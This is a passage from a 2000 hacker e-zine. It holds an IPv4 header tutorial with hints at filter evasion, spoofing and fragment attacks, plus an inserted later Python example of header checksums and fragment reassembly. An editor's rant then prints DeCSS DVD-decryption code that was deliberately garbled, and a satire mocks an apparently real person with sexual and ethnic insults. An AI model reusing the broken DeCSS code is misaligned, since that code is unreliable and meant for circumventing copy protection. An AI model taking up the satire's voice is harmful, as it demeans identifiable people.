datagram on IPv4. "cd /proc/sys/net/ipv4/" if you're smart and run Linux.

<<VERSION FIELD 0-4 BITS>> Sometimes referred to as VERS

The Version field tells us the IP protocol version. It occupies the first
field, from bit 0 to 4. This field tells us that this IP datagram is using
IPv4, IP version 4. To find out more about IPv4 consult your local RFCs.

<<IP Header Length "IHL" 4-8 BITS>> Sometimes referred to as HLEN

This field tells us the total length of the header, counted in 32-bit words.
The default value is normally 5 because you hardly ever use any options in
the header. Now since this is a 4-bit field you are limited to a header size of
60 bytes. This cripples some options (like the record route option) but
who cares. Now you can do very leet things with this field; things like
this are best when found on your own. But let's just say you can bypass
packet filters and be very sneaky about your data transfers. Be lucky I
told you that.

<<Type Of Service 8-16 BITS>> Sometimes referred to as T.O.S.

Now this is one of my favorite fields because it controls how the packet is
sent in transit. This field is fubar too, because the 3-bit precedence
field isn't used any more. So we're gonna focus on the T.O.S. bits; yes, there
are 4. These fields are as follows.

0 1 2 3 4 5 6 7 8 ASCII ART STOLEN
+-----+-----+-----+-----+-----+-----+-----+-----+ AGAIN "IM LAZY!"
| | | | | | |
| PRECEDENCE | D | T | R | 0 | 0 |
| | | | | | |
+-----+-----+-----+-----+-----+-----+-----+-----+

D: OK, bit 3, the big D, "Delay". You have 2 options for all these bits.
You put a "0" in this field if you want normal delay, 1 for low delay.
T: Bit 4 is the "Throughput", the big T.
You put a 0 for normal throughput, a 1 for high throughput.
R: Bit 5 is the rascally R, "Reliability". 0 for normal reliability, 1 for
high.
The last fields are reserved for future use unless you're mucking around
with an experimental protocol.
Now the values here will show up in hex in tcpdump. TOS affects a lot more
things than what I described here and goes on to many more levels. This is
just the basics for you to understand what's going on.
Lots of DoS programs play with this.

<<Total Length 16-31>> "Actually 16-30" Total packet length

Now this field gives the total length of the datagram, IP header and data
together. The maximum value of this field is 65535 bytes. If this is bigger
than what the router or host will accept, prepare to be fragmented. More on
that later. We can also use this field to tell where the data portion of the
IP datagram starts and its length. Usually this field is most used by data
links, aka Ethernet, to solve some minor problems.

On to the second layer. You guys still with me? Hang in there, it will all
add up soon.


<<Identification 0-16>>

This field is just a simple 16-bit field. It assigns a number
to each datagram for reassembly upon fragmentation. In other words, all
the fragments of datagram foo will have the exact same Identification
number. The kernel usually increments a variable for each datagram upon
assigning the value. Basically it assigns a new ID to each datagram.

<<Flags 16-19>>

This field controls the fragmentation values of the packet.
Fragmentation is basically when you break a datagram into little chunks
and assemble them again at the other end. Kinda like how they took apart
that bridge somewhere in history. They gave each brick a number, took it
apart, then moved the bridge brick by brick to its new home and put
all the bricks back together. The bridge was too big to move as a whole, so
they moved it brick by brick ("fragments") and put it all back the way it was
at the new location.

0 1 2
+---+---+---+
| | D | M |
| 0 | F | F |
+---+---+---+

That's what the flag portion of the second layer looks like. It's 3 bits.
The first bit is reserved for those men walking around in black coats
or something. So we will focus on bits 1 and 2. This is rather simple here.

The second bit, "1":
DF: "Don't Fragment". 0 in this bit means let it be fragmented, 1 means do not
allow fragmentation.

The third bit, "2":
MF: "More Fragments". 0 in this bit signals that this is the last fragment in
this datagram, and 1 tells us that there are more fragments.

This field is also used by dosers who think they're a big man because they can
run hack.c, root an OC3 and type ping -f, let alone some who use terminals at MIT.
Yeah bitch, you know who I am talking about. Note this requires NO SKILL WHAT
SO EVER. If you want to make an impact, root their host (j/k) or just plain
school them, which is also lame, but it shows us you've got more brains than
the average antionline.com junkie.

<<Fragment Offset 19-31>>

This field is really simple. It tells us where in the original datagram this
fragment's data belongs, to aid in reassembly. The value is measured in units
of 8 bytes (64 bits), so the real byte offset is this field times 8, which is
also why every fragment but the last carries a multiple of 8 bytes of data.
I won't go in depth on this field 'cause it's usually useless to hacking.
USUALLY ;) (Overlapping and out-of-order fragments are exactly what teardrop
style crashes and fragment-based IDS evasion play with, so it pays to know
how a given reassembler treats them.)

Now we move onto the third row.


<<Time To Live 0-7>> TTL

This is nominally the time in seconds that a datagram can travel. In reality
every router the datagram goes through takes 1 away from it, so it is a hop
count. When the value reaches 0 the datagram is dropped and the router sends
an ICMP "time exceeded" message back to the source (which is all traceroute
really is). Common defaults are 64 (most Unix), 128 (Windows; older versions
used 32) and 255 (Cisco, Solaris). Suppose I sent a datagram to your host and
it took 3 hops to get there. You will have to add those hops back onto the
TTL you see when figuring out my operating system's default TTL.

<<Protocol 8-15>>

This is just a simple value that tells the receiving stack which upper layer
protocol the datagram's data belongs to. I'm just gonna give you some basic
options here.

1 Internet Control Message Protocol (ICMP)
2 Internet Group Management Protocol (IGMP)
6 Transmission Control Protocol (TCP)
17 User Datagram Protocol (UDP)

I'm not gonna go in depth on this one either 'cause it's rather simple.
But if you'd like more information, start from the Assigned Numbers RFC
(RFC 1010 and its successors; the current list is kept by IANA).
This field has a ton of uses: DoS, hacking, forging packets, etc. Note that a
packet filter that matches only on TCP and UDP ports has nothing to say about
the other protocol numbers, which is worth checking in any ruleset.

<<Header Checksum 16-31>>

Well since this isn't a perfect world you need this field. And because, from
what I explained earlier, the TTL value is gonna change with each hop, every
router has to recompute this value at EACH hop.
I suck at math so I'm gonna take what another pro in this field said:
"For purposes of computing the checksum, the value of the checksum field is
zero. (At least, according to RFC 791). My interpretation: one's complement
each sixteen bit word in the header, add all these quantities (drop carries)
and then one's complement that sum." He explained it in more layman's terms
than I could for ya. (RFC 791's own wording is: the 16 bit one's complement of
the one's complement sum of all 16 bit words in the header, with carries folded
back into the low end rather than dropped.) At the receiver the same sum is
taken over the whole header, checksum included: if it comes out as all 1's the
packet is accepted, if not the host says "uhm, something is wrong" and discards
the packet. Do not pass go, do not collect a hundred dollars, let the higher
layers send you the error. Note that this checksum covers the IP header only,
not the data. TCP and UDP carry their own checksums over their header, their
data and a pseudo-header, but they use the same algorithm.
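
The flags, the fragment offset and the checksum are easier to see in code
than in prose. What follows is an added example, not part of Vortek's article:
it builds a 20-byte IPv4 header, computes and verifies the RFC 791 checksum,
performs the per-hop TTL decrement and checksum recompute a router does, and
splits and reassembles a datagram using MF and the offset in 8-byte units,
refusing overlapping fragments rather than guessing. Addresses, IDs and payloads
are constructed sample values and the helper names are my own, not any stack's.

```python
import socket
import struct

IP_DF = 0x4000      # Don't Fragment (bit 1 of the flags)
IP_MF = 0x2000      # More Fragments (bit 2 of the flags)
FRAG_MASK = 0x1FFF  # 13-bit fragment offset, in 8-byte units


def ipv4_checksum(header: bytes) -> int:
    """RFC 791: one's complement of the one's-complement sum of the 16-bit
    words, carries folded back in. Over a header with its checksum filled in
    the result is 0, which is the receiver's all-ones test."""
    if len(header) % 2:
        header += b"\x00"
    total = 0
    for i in range(0, len(header), 2):
        total += (header[i] << 8) | header[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, proto, ident, flags=0, frag_off=0,
                      ttl=64, payload_len=0) -> bytes:
    """20-byte option-less header. frag_off is in bytes (multiple of 8)."""
    if frag_off % 8:
        raise ValueError("fragment offset must be a multiple of 8 bytes")
    hdr = struct.pack("!BBHHHBBH4s4s",
                      (4 << 4) | 5,             # version 4, IHL = 5 words
                      0,                        # TOS
                      20 + payload_len,         # total length
                      ident,
                      flags | (frag_off // 8),  # flags + offset in 8-byte units
                      ttl, proto,
                      0,                        # checksum computed below
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]


def parse_ipv4_header(pkt: bytes) -> dict:
    """Decode the fixed header fields the article walks through."""
    (ver_ihl, _tos, total_len, ident, flags_frag,
     ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {
        "version": ver_ihl >> 4, "ihl": ihl, "total_len": total_len,
        "id": ident, "ttl": ttl, "proto": proto,
        "df": bool(flags_frag & IP_DF), "mf": bool(flags_frag & IP_MF),
        "frag_off": (flags_frag & FRAG_MASK) * 8,       # back to bytes
        "checksum_ok": ipv4_checksum(pkt[:ihl]) == 0,   # header only, not data
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
    }


def forward_hop(pkt: bytes):
    """What each router does: drop on bad checksum or expired TTL (sending
    ICMP Time Exceeded), else take 1 off the TTL and recompute the checksum."""
    hdr = parse_ipv4_header(pkt)
    if not hdr["checksum_ok"] or hdr["ttl"] <= 1:
        return None
    out = bytearray(pkt)
    out[8] -= 1                    # TTL
    out[10:12] = b"\x00\x00"       # checksum field is zero while computing
    out[10:12] = struct.pack("!H", ipv4_checksum(bytes(out[:hdr["ihl"]])))
    return bytes(out)


def fragment(src, dst, proto, ident, payload: bytes, chunk_len=8) -> list:
    """Split payload into fragments of chunk_len bytes (multiple of 8),
    MF set on every fragment but the last. Constructed helper for the demo."""
    frags = []
    for off in range(0, len(payload), chunk_len):
        chunk = payload[off:off + chunk_len]
        mf = IP_MF if off + chunk_len < len(payload) else 0
        frags.append(build_ipv4_header(src, dst, proto, ident, mf, off,
                                       payload_len=len(chunk)) + chunk)
    return frags


def reassemble(fragments):
    """Put one datagram's fragments back together from MF and the offset.
    Returns None on a hole, a missing last fragment or overlapping data:
    overlap is the teardrop / IDS-evasion case, and refusing it beats
    guessing which copy the end host would keep."""
    pieces = []
    for f in fragments:
        h = parse_ipv4_header(f)
        pieces.append((h["frag_off"], h["mf"], f[h["ihl"]:h["total_len"]]))
    pieces.sort(key=lambda p: p[0])
    if not pieces:
        return None
    data, expect = bytearray(), 0
    for off, _mf, chunk in pieces:
        if off != expect:          # off > expect is a hole, off < expect overlap
            return None
        data += chunk
        expect = off + len(chunk)
    return None if pieces[-1][1] else bytes(data)
```

Two things to notice when you run it: `checksum_ok` goes false the moment any
header byte (the TTL, say) changes without the checksum being redone, which is
why every hop has to recompute it, and `reassemble` rejects two fragments that
claim the same offset instead of picking one, because different end hosts
resolve that overlap differently and an IDS that guesses wrong sees a different
stream than the victim.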

Next row
<<Source IP Address 0-31>> src

A 32 bit address goes here. Usually you see them in dotted-decimal notation:
123.456.789.255, which isn't a real address (each of the four octets tops out
at 255), but you get the point.
Uses for this field are connectionless spoofing: with UDP or ICMP there is no
handshake, so nobody checks that the address is yours. Usually used for DoSing.
There are also things you can do with it to evade packet filters that trust
certain source addresses, but that is much harder than just changing this
field, and any ingress filtering on the way out drops the obviously forged ones.
Next row

<<Destination IP Address 0-31>> dst

This is just the 32 bit destination address, nothing complicated here.
Uses: DoSing servers, mucking around with name servers and servers in
general, playing with subnets (directed broadcast addresses being the
classic one).


<<IP Options, if any (variable length)>>

This field holds variable length optional parameters for the datagram. One
example is the security option, mainly used by the military, from RFC 1108
(whose code for "Top Secret" is 00111101):
+----------+----------+----------------+--------------------//-----+
| 10000010 | XXXXXXXX |    00111101    | AAAAAAA1 ...  AAAAAAA0    |
+----------+----------+----------------+--------------------//-----+
 TYPE=130   LENGTH     CLASSIFICATION   PROTECTION AUTHORITY FLAGS
            (variable) LEVEL            (low bit 1: another octet
                       ("Top Secret")    follows; 0: last octet)


This is just a basic layout; if I were to cover this it would have to be
a whole other article. Anyway, options in this field let you specify things
like strict source route, loose source route, record route and timestamp.
If you'd like to learn more about this field read the RFC I mentioned, and
RFC 791 for the rest of the options. Like I said the field is mainly used for
security purposes. Uses for this field are things you must figure out on your
own! (One hint that isn't a secret: source routing lets the sender pick the
path a packet takes and, worse, the path the reply takes, which is why most
hosts and routers are configured to drop source-routed packets outright.)

<<Padding (to a 32 bit boundary)>>
Zero bytes that fill out the last 32 bit word of the header when the options
don't end on one, so the header stays a whole number of words long.
Mainly of use for buffer overflows ;).

Last row!
<<Data (variable)>>
DATA (variable, up to 65535 bytes minus the header)
All the data goes in here. Simple, hey?

Summary: Now you should have a very basic understanding of how your data is
travelling. Now I must let you know everything I explained here is just for
the IP datagram. There is much more framing that goes on as data travels
"encapsulated" through the different protocols. And also these rows are
32 bits wide, with the bits numbered 0 to 31, which you should have figured
out already. Everything here is original content except where noted.

Hope you enjoyed my article. Look forward to many more and a possible part 2
to this article. vortek@svun.org
__ __ _ _
\ \ / /__ _ __| |_ ___| | __
\ \ / / _ \| '__| __/ _ \ |/ /
\ V / (_) | | | || __/ <
\_/ \___/|_| \__\___|_|\_\




[Parting Rant]======================================================[The Editor]

Ahh. Where to start on the parting rant. I guess I will rant about what everyone
else is ranting about. You see, I have been doing some idling, er, thinking, and
I have come to the conclusion that innovation is no longer tolerated in
American society. From DeCSS to the CueCat scanner, it looks like everyone
out there is ready to tell people what they can and can't do with their stuff.

And I guess I could be mentally ill, because I am scared. I walk through the
mall, and I see all these people, and I have never seen so many cattle in my
life. They are being Good American Citizens. They work, they shop, they read
the manual, and do exactly as it says. They pay their taxes, and they vote.
Everything in American society has a manual. Be it accepted use of your
television, or the license on your shiny new Metallica CD, or even American
law books could be called manuals. And just like breaking a physical law, when
people go outside the manual, they go to jail, or they are sued, or even hassled
into submission. I look at the Internet, and I watch what it is doing to
different countries. In America, I see it boom the economy, provide jobs, and
create ruckus. In China, I watch people speak out, and get slammed down. Even
India and Pakistan are trying to use the Internet, fighting their wars. It's
no longer just a medium to exchange information, it's a medium that can affect
whole countries, or singular lives. It can introduce your future mate, or put
you in jail for a long time. And I watch governments try to write a manual for
it. What exactly is "acceptable use" of the Internet? I beg you, readers, to
relish these moments, because the Internet can be controlled. It can be regulated.
We would all like to think otherwise, and we shift the idea to a dark part of
our minds, but I can compare the possible outcome to the drug war in America.
Everyone said the same stuff about pot (which I do not partake in). "Ahh, it's too
widespread for it to be outlawed! Even police officers do it!" And yet many
people sit in a jail cell for a simple possession charge.

Dear reader, the powers that be would love nothing more than for us to sit behind
our terminals, and become the sheep, use our credit cards, and shop, shop,
shop, and while I find nothing wrong in making money, I do find it wrong to be a
brainwashed zombie. Something, hopefully, will be done before it's too late. If
you are a hacking group, I urge you to stop defacing for no reason, and start
trying to educate people. Use the skills, and teach others. Because if we lose
basic rights in technology, WE will hurt. 70% of the public will not even know
what they lost. Through education, we can get everyone involved. We can teach
people to ignore the manuals and do whatever the hell they want with their
equipment.

Incidentally, since I brought up DeCSS, I was wondering just how much of the
code may be passed along before a team of angry suits comes beating down your
door? Shall we take the tootsie pop test? I think we shall, in the spirit of
good old-fashioned experimentation.

Here is an excerpt of some "code" that is quite broken. It is quite
non-functional. It WILL NOT compile. But do peruse it.






static void css_titlekey(byte *key, byte *im, byte invert)

int i
byte k[5]
int val

unsigned int lfsr0, lfsr1
byte o_lfsr0, o_lfsr1

lfsr0 = ((im[4] << 17) | (im[3] << 9) | (im[2] << 1)) + 8 - (im[2] & 7);
lfsr0 = (reverse[lfsr0&0xff]<<17) | (reverse[(lfsr0>>8)&0xff] << 9)
| (reverse[(lfsr0>>16)&0xff]<<1) |(lfsr0>>24)

lfsr1 = (reverse[ im[0] ] << 9) | 0x100 | reverse[ im[1]];

#if (CSS_DEBUG & 0x01)
fprintf( stderr,"SEED lfsr0:0x%08x lfsr1: 0x%08x\n", lfsr0, lfsr
1)
#endif

val = 0;
for (i = 0; i < 5; ++i) {

o_lfsr0 = (lfsr0 >> 12) ^ (lfsr0 >> 4) ^ (lfsr0 >> 3) ^ lfsr0;

o_lfsr1 = ((lfsr1 >> 14) & 7) ^ lfsr1
o_lfsr1 ^= (o_lfsr1 << 3) ^ (o_lfsr1 << 6)

lfsr1 = (lfsr1 >> 8) ^ (o_lfsr1 << 9)
lfsr0 = (lfsr0 >> 8) ^ (o_lfsr0 << 17)

#if (CSS_DEBUG & 0x01)
fprintf( stderr,"lfsr0:0x%08x lfsr1: 0x%08x o_lfsr0:0x%02x o_lfs
r1:0x%02x\n",
lfsr0, lfsr1, o_lfsr0, o_lfsr1);
#endif

val += (o_lfsr0 ^ invert) + o_lfsr1;

k[i] = val & 0xff;
val >>= 8;


key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]

key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]

int css_decrypttitlekey(byte *tkey, byte *dkey, struct playkey **pkey

byte test[], pretkey[]
int i = 0

for (; *pkey; ++pkey, ++i)
memcpy(pretkey, dkey + (*pkey)->offset, 5)
css_titlekey(pretkey, (*pkey)->key, 0)

memcpy(test, dkey, 5)
css_titlekey(test, pretkey, 0)

if (memcmp(test, pretkey, 5) == 0)
fprintf(stderr, "Using Key %d\n", i+1);
break;



if (!*pkey)
fprintf(stderr, "Fuck MPAA - Need Key %d\n", i+1);
return 0;


css_titlekey(tkey, pretkey, 0xff)
return 1



void css_descramble_my_eggs(byte *sec,byte *key)


#define SALTED(i) (key[i] ^ sec[0x54 + (i)])

unsigned char *end = sec + 0x800
int val;
unsigned int lfsr0, lfsr1;
byte o_lfsr0, o_lfsr1

lfsr0 = ((SALTED(14) << 17) | (SALTED(3) << 9) | (SALTED(2) << 1)) + 8 -
(SALTED(2)&7)
lfsr0 = (reverse[lfsr0&0xff]<<117) | (reverse[(lfsr0>>18)&0xff] << 9)
| (reverse[(lfsr0>>16)&0xff]<<11) |(lfsr0>>124)

lfsr1 = (reverse[SALTED(0)] << 19) | 0x100 | (reverse[SALTED(1)])

#if (CSS_DEBUG & 0x10)
fprintf( stderr,"SEED lfsr0:0x%08x lfsr1: 0x%08x\n", lfsr0, lfsr
1)
#endif

sec+=0x80
val = 0
while (sec != end) {
o_lfsr0 = (lfsr0 >> 66) ^ (lfsr0 >> 14) ^ (lfsr0 >>333) ^ lfsr0

o_lfsr1 = ((lfsr1 >> 14) & 7) ^ lfsr1
o_lfsr1 ^= (o_lfsr1 << 13) ^ (o_lfsr1 << 16)

lfsr1 = (lfsr1 >> 18) ^ (o_lfsr1 << 19)
lfsr0 = (lfsr0 >> 18) ^ (o_lfsr0 << 17)

val += o_lfsr0 + (byte)~o_lfsr1
*sec++ = csstab1[*sec] ^ (val & 0xff)
val >>= 8

#if (CSS_DEBUG & 0x100)
fprintf( stderr,"lfsr0:0x%08x lfsr1: 0x%08x o_lfsr0:0x%02x o_lfs
r1:0x%02x\n",
lfsr0, lfsr1, o_lfsr0, o_lfsr1)
#endif


There. My apologies to the author for shitting all over his code. I assure you,
this is now just a meaningless jumble of letters and numbers, and funny little
bracket things. It still bears a strong likeness to the original, but really,
how can a bunch of suits know? It has functions that are called something
like the code in question, but can't we as a free nation call our functions
anything we want? So I guess, is this code really questionable now that it's
broken? Of course, an ingenious soul might be able to put it back together, but
that same ingenious soul could have written his own to begin with.

Anyways, that's the rant, take it as you will, but it's a free country here
and I am just enacting my freedom of speech. I urge you all to do the same.

Digital Ebola, September 6th, 2000



[The Art of Selling Out]===================================================[J-P]

/* Editor's Note: This account is a sad tale of how people in the scene turn out.
Everything here is purely a kwinky-dink. If you take offense, then you might
just have a guilty conscience. =)

*/

Hello kids! My name is J-P! I have decided to share with you the great knowledge
I have acquired over the last few years. You see, at one time in my life, I was
just like you! Yes, I was! I struggled to learn something that most people
cannot even begin to comprehend. Then one day, I decided that I could not learn
ANYTHING! I was sad. I cried. I asked my mommy's advice. She said I should sell
out, and screw everyone possible!

Why could I sell out? Because I had made "friends". I was a lowly regular in a
channel on IRC called #hackphreak, which resides on a network called...
Undernet? Am I going too fast for you? This stuff confuses me sometimes...
Anyways, I saw all the "l33t0h" hackers on a daily basis. I talked to them,
they talked to me, and we were the BEST of friends! Yes, we were! Since I had
nothing better to do than go to college, I could spend every waking moment
doing things like real hackers! Except I wasn't a real hacker, but I thought I
would try and be the next best thing. A reporter about hackers! So, I create
this site (surely you have heard of it, haven't you?) and I fuck up and get
kicked outta school. They just didn't understand my brilliance. So, I find myself
working at a quickie mart, and life was just sucking. I still tried to
understand what these hacker guys were talking about, but alas, someone took
a giant leak in my gene pool, and it made my brain about the size of a golf ball.

Well, after my mom (she is great, isn't she?) tried to market me as the
missing link to a local circus, I decided to try and keep my site (which is VERY
famous) going. My goal was to get both sides of the security industry - the
hackers that break things, and the admins that fight the hackers. Whew. How I
came up with this idea, I don't know, I think I thought of this while whacking
off in the bathroom (I am still pure, mommy says wait until I get married!).
This idea was working out great, I was meeting all the famous hackers, and
getting their stories. I was becoming a star, and a friend to admins and hackers
alike. I had friends. Then one day, I thought working at the local quickie mart
was not cool. Some federal agent guys asked me for information. ALL kinds of
information. So, since I was broke, I thought, what the hell! Those hacker guys
are smarter than me anyways! They are jerks! Fuck em! (Sorry mommie, I did not
mean to write that naughty naughty word). So, I gave them up to the feds.
They got busted. I got paid. Life sucks and then you die.

This gave me the most enlightening idea: I could do this for a living! It's so
easy! So, after several years of acting nice to people, trying to be their
friends (I really hate it when they talk about my mommie), I decided to make
my move: go corporate. This move was very well received by some very clueless
people with money, so next thing I knew, heck, I had an office! Now some more
clueless people want me to secure their sites, and consult for them! I go into
many, many places, and lecture. Like the US Government. I really hate it when
they get owned, it's really not my fault! I just secure them! Not like I actually
run their servers or anything. I got them to start implementing Microsoft
Windows NT 4.0! I just don't know anything else, and really, it's secure!

Anyways, I simply MUST continue. I decide to sell more people out, and I get
more money, and my life is great, a college dropout that is making LOTS of
cash. When business is slow, I just dial up my lawyer (she really is great,
isn't she?) and I start suing people! But now, I have better things to do, since
I got my first girlfriend! She is a security expert like me! Although she
is an older woman (I have to calculate her age with a Cray T3E that the government
lets me use) she does in fact know A LOT about security. We are doing a book
and a movie! OH! DID I MENTION? I WAS ON A MUSIC VIDEO STATION!$@# Oh yeah,
I kinda lied to them, but my investors said it was okay. So where was I? Oh ya.
I teamed up with old lady girlfriend (the sex is great, sorry mom!) and now
we are trying to kill off all the people I have stepped on to get to where I am today.

If it wasn't for the hackers though, I would be outta a job. I would be at the
quickie mart, servin' up slurpees with Habib (who is now my lead web designer).
This is how I am in my current position in life, and my god, I am so elite.

I just want to say THANKS! to all the people I have fucked, and a very
special thanks to the attrition crew, because they are smarter than me, and I
just can't have people out there in the world that are smarter than me, so
I guess I will have to destroy them!

Oh, I also didn't like what Bub said about cult_hero... Bub said that cult_hero
owned me. That is wrong! Satan owns me. And my clueless investors. And my
mommie... And my old bag granny girlfriend (I love sucking on her wrinkles
while she moans "I'm owned, I'm soooooo owned...").

Ah, I think I am going to go write some more lies, and make some more
money... It's hard being me, really it is.


--------------------------------------------------------------------------------
S U B M I T T O K E E N V E R A C I T Y
--------------------------------------------------------------------------------
NO! You do not have to be a member of Legions of the Underground to submit to
KV. You can be a member of something else! Nobody is perfect! If you have an idea
and would like to toss it out in the wind for general discussion, or maybe you
are researching something and you just want feedback, KV is a great way to get
your ideas out in the open. We at Legions of the Underground are not prejudiced
in any way, shape or form, so even an AOLer's article may be published if it seems
that it has clue. Or then again, maybe hell will freeze over! Anyone's stuff
may be published, but we will never know if you don't submit! So get to writing.
Because what you don't know can kill you! Legions of the Underground is an
equal opportunity destroyer.
--------------------------------------------------------------------------------
All submissions to: submit@legions.org
--------------------------------------------------------------------------------
IRC: Undernet #legions
--------------------------------------------------------------------------------
O F T E N I M I T A T E D N E V E R D U P L I C A T E D
--------------------------------------------------------------------------------
L E G I O N S O F T H E U N D E R G R O U N D

n :.
E% ___ _______ ___ ___ :"5
z % | | (_______) | | | | :" `
K ": | | | | | | | | | | z R
? %. | | | | | | | | | | :^ J
". ^s | |___ | |___| | | |___| | f :~
'+. #L |_____| \_____/ \_____/ z" .*
'+ %L

  
z" .~
": '%. .# +
": ^%. .#` +"
#: "n .+` .z"
#: ": www.legions.org z` +"
%: `*L z" z"
*: ^*L z* .+"
"s ^*L z# .*"
#s ^%L z# .*"
#s ^%L z# .r"
#s ^%. u# .r"
#i '%. u# .@"
#s ^%u# .@"
#s x# .*"
x#` .@%.
x#` .d" "%.
xf~ .r" #s "%.
u x*` .r" #s "%. x.
%Mu*` x*" #m. "%zX"
:R(h x* "h..*dN.
u@NM5e#> 7?dMRMh.
z$@M@$#"#" *""*@MM$hL
u@@MM8* "*$M@Mh.
z$RRM8F" [knowledge is key] "N8@M$bL
5`RM$# 'R88f)R
'h.$" #$x*


--------------------------------------------------------------------------------
All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity,
copyright (c) 2000 legions.org, all rights reserved.
--------------------------------------------------------------------------------

